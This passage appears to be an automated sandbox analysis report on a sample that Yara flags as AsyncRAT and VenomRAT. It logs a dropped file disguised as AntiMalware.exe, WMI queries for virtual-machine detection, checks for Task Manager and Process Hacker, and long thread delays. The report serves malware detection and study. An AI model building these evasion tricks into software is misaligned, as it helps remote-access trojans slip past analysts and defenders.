                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: ZzOTKK2V8l.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.2.ZzOTKK2V8l.exe.36ea760.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.ZzOTKK2V8l.exe.600000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPED
                            Yara detected VenomRAT
                            Source: Yara matchFile source: 0.2.ZzOTKK2V8l.exe.36ea760.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ZzOTKK2V8l.exe PID: 6368, type: MEMORYSTR
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                            Source: ZzOTKK2V8l.exe, AntiMalware.exe.0.drBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeMemory allocated: E50000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeMemory allocated: 1B5A0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeMemory allocated: 1050000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeMemory allocated: 1B7E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeMemory allocated: 1500000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeMemory allocated: 1B650000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4820Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2651Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4872Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1283Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4311Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1191Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4585Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 988Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5460
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1497
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeWindow / User API: threadDelayed 6113
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeWindow / User API: threadDelayed 3733
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5031
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4756
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5574
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4815
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5180
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1511
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4930
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1968
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5318
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1689
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exe TID: 5272Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416Thread sleep count: 4820 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416Thread sleep count: 2651 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5752Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4712Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep count: 4872 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3692Thread sleep count: 1283 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416Thread sleep count: 4311 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416Thread sleep count: 1191 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe TID: 5784Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3480Thread sleep count: 4585 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2964Thread sleep count: 988 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3692Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5760Thread sleep count: 5460 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep count: 1497 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6800Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe TID: 7112Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe TID: 2000Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe TID: 4824Thread sleep count: 6113 > 30
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exe TID: 4824Thread sleep count: 3733 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5768Thread sleep count: 5031 > 30
